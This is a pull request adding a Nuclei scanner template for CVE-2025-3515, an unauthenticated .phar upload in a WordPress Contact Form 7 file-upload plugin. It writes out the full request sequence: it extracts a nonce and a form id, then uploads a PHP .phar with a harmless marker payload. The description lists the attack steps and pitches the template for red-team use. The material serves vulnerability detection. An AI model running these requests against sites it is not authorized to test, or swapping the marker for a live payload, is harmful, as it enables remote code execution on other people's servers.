### PR TITLE
CVE-2025-3515

### DIFF
--- a/http/cves/2025/CVE-2025-3515.yaml
+++ b/http/cves/2025/CVE-2025-3515.yaml
@@ -1,0 +1,83 @@
+id: CVE-2025-3515
+
+info:
+  name: WordPress CF7 Drag & Drop Upload <= 1.3.8.9 - Unauth .phar Upload
+  author: Trex
+  severity: high
+  description: |
+    Drag and Drop Multiple File Upload for Contact Form 7 <= 1.3.8.9 allows
+    unauthenticated .phar file upload leading to RCE in Apache+mod_php.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-3515
+  classification:
+    cvss-score: 8.1
+    cve-id: CVE-2025-3515
+    cwe-id: CWE-434
+  metadata:
+    max-request: 2
+  tags: cve,cve2025,wordpress,fileupload,rce,phar,unauth
+
+variables:
+  page_path: "/"
+
+http:
+  - raw:
+      - |
+        GET {{page_path}} HTTP/1.1
+        Host: {{Hostname}}
+        
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----n{{randstr}}
+        
+        ------n{{randstr}}
+        Content-Disposition: form-data; name="action"
+        
+        dnd_codedropz_upload
+        ------n{{randstr}}
+        Content-Disposition: form-data; name="security"
+        
+        {{nonce}}
+        ------n{{randstr}}
+        Content-Disposition: form-data; name="id"
+        
+        {{field_id}}
+        ------n{{randstr}}
+        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.phar"
+        Content-Type: application/octet-stream
+        
+        <?=md5('{{randstr}}')?>
+        ------n{{randstr}}--
+
+    extractors:
+      - type: regex
+        name: nonce
+        internal: true
+        part: body_1
+        group: 1
+        regex:
+          - '"nonce":"([a-f0-9]+)"'
+          - '"ajax_nonce":"([a-f0-9]+)"'
+          
+      - type: regex
+        name: field_id
+        internal: true
+        part: body_1
+        group: 1
+        regex:
+          - 'data-id="(\d+)"'
+          - 'wpcf7-f(\d+)-'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status: [200]
+        
+      - type: word
+        part: body_2
+        words: ['"success":true']
+        
+      - type: regex
+        part: body_2
+        regex: ['/[^"]*{{randstr}}\.phar']

--- a/http/cves/2025/CVE-2025-3515.yaml
+++ b/http/cves/2025/CVE-2025-3515.yaml
@@ -25,28 +25,28 @@ http:
       - |
         GET {{page_path}} HTTP/1.1
         Host: {{Hostname}}
-        
+
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=----n{{randstr}}
-        
+
         ------n{{randstr}}
         Content-Disposition: form-data; name="action"
-        
+
         dnd_codedropz_upload
         ------n{{randstr}}
         Content-Disposition: form-data; name="security"
-        
+
         {{nonce}}
         ------n{{randstr}}
         Content-Disposition: form-data; name="id"
-        
+
         {{field_id}}
         ------n{{randstr}}
         Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.phar"
         Content-Type: application/octet-stream
-        
+
         <?=md5('{{randstr}}')?>
         ------n{{randstr}}--
 
@@ -59,7 +59,7 @@ http:
         regex:
           - '"nonce":"([a-f0-9]+)"'
           - '"ajax_nonce":"([a-f0-9]+)"'
-          
+
       - type: regex
         name: field_id
         internal: true
@@ -72,12 +72,15 @@ http:
     matchers-condition: and
     matchers:
       - type: status
-        status: [200]
-        
+        status:
+          - 200
+
       - type: word
         part: body_2
-        words: ['"success":true']
-        
+        words:
+          - '"success":true'
+
       - type: regex
         part: body_2
-        regex: ['/[^"]*{{randstr}}\.phar']
+        regex:
+          - '/[^"]*{{randstr}}\.phar'


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
**Template Motivation**
WordPress CF7 drag-drop plugin exposes unauth .phar upload = instant RCE on Apache+mod_php stacks.
Zero-click exploitation via AJAX endpoint bypass. No admin creds needed.
Attack Vector

Extract nonce from public page
Upload .phar via dnd_codedropz_upload action
Achieve code execution through PHAR stream wrapper

**Why This Matters**
- 0-day in 10k+ WordPress sites
- Unauthenticated RCE
- Apache+mod_php = game over
- Bypasses file upload restrictions

**References**
https://github.com/Professor6T9/CVE-2025-3515
https://wpscan.com/plugin/drag-and-drop-multiple-file-upload-contact-form-7/

Perfect for red team engagements targeting WordPress infrastructure.
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

/claim #13029